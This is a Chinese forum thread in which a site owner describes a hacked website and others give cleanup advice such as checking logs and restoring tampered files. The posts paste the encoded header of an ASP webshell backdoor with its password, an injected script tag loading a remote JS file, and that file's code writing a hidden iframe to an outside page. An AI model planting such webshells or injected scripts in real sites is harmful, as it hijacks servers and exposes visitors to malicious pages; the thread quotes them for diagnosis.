调试易

这种工具很多,
但是没有php做的。而且,你怎么知道网站被挂马了。

 刚开始不知道
就是速度慢
后来发现加载时候状态栏有显示别的网站
就看了源码 发现被挂马了
并且在好几个文件夹里找到后门程序 asp php的都有
为什么没有php做的呢 唉

你那个不叫木马程序。
1.你用的是什么系统？可能的话，从日志找出被侵入的痕迹。
  例如，被篡改的文件最后在什么时间被修改，而那个时间段都有谁从什么地方登陆过。
2.如果是病毒的话，用杀毒软件查杀，缩小文件的访问权限。
3.确定被改写的密码，把被篡改的文件grep出来，恢复原始文件。
4.不排除内部人员搞鬼
老实话，如果是windows的话，真不知道该怎么弄。Linux/Unix的话相对比较容易解决。

<%@ LANGUAGE = VBScript.Encode %><%UserPass="abcd123@" '修改密码   
VerName="冷-轩客户专用纯净版！.."  '版权                    
Ver="绝对的非安全" '声明 
StateName="http://www.hackah.cn" '状态栏文字#@~^6X8BAA==jD-Dc?mMkaOKb:nW!Yx1O,,O1,O,)"ndwKxk+ A;W6+.P{OD!+l6 P2..KD~Id!:n,16Y=/!8PUtGhAD.c*)fbhPtWD6r/W9+=HGDWr;W[+{E0&P[UAPPwM'tdE^oc+d Wa/+"d'M-MlnV;R..APP,~-C-zC&@*D(@!@*l&@!&MJP'P GkDwr.1/+9 MD3PL~Je&pwk4xL@*M8@!@*Bb`0mC8cXDKO/bt)D2rD1/m\CLvx6+.t,C@!@*D8@!JezG41+~P,~'ew

在文件夹中找到的一个 名为adminn.asp 的文件这个应该是后门吧 我不太懂 不过看情况应该算是吧
文件还很长 我只是把头部贴出来了
不是木马程序
只是添加的 类似<script src=http://12020.cn/2.js>之类的代码
加载他的js文件 该文件的内容我下载下来了 如下
document.write("<div style=\"display:none\">");
document.write("<iframe src=http://baidu.bbtu02.cn/w70/w70.htm width=100 height=0></iframe>");
document.write ('<script language="javascript" type="text/javascript" src="http://js.users.51.la/2344860.js"></script>');严格来说这应该是盗取流量的 和做弹窗的

这种问题很严重，一般都是网站存在漏洞或者服务器存在漏洞而被攻击了，若需要安全技术服务请联系EMAIL & MSN：[email protected]， 7X24 为您的网站和服务器保驾护航。

铱迅WEBSHELL扫描器 可以扫描